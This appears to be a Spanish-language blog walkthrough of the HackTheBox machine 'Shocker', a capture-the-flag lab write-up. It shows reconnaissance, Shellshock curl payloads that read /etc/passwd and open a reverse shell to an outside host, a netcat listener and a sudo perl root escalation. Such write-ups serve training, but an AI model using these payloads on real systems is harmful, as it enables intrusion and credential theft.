Machine:Shocker
SHOCKER
OS: Linux
Machine: Shocker
Dirección IP: 10.10.10.56
Reconocimiento:
Comandos:
nmap -sC -sV 10.10.10.56
Aplicación Web:
Se realizó un crawler al sitio con el script dirsearch.py, encontramos el directorio cgi-bin:
Comandos:
python3 dirsearch.py -u http://10.10.10.56 -E -t 50
Realizamos un crawler al directorio cgi-bin, con la finalidad de encontrar scripts sh, py, pl, cgi:
Comandos:
python3 dirsearch.py -u http://10.10.10.56/cgi-bin/ -e "sh,py,pl,cgi" -t 50
Script encontrado:
user.sh
Explotación
Comprobamos que el script user.sh es vulnerable a Shellshock, con el siguiente script:
Link del Script: https://github.com/opsxcq/exploit-CVE-2014-6271
Script:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.56/cgi-bin/user.sh
Obtendremos una shell con el siguiente script dejando un puerto en escucha:
Script:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.20/4444 0>&1'" http://10.10.10.56/cgi-bin/user.sh
Comandos:
nc -lvnp 444
Obtenemos la bandera de usuario:
Elevación de Privilegios
sudo -l
sudo /usr/bin/perl -e 'exec "/bin/sh"'
Finalmente obtenemos la bandera de root:
Etiquetas: Hacking, HackTheBox, Walkthrough
0 comentarios:
Publicar un comentario
Suscribirse a Enviar comentarios [Atom]
<< Inicio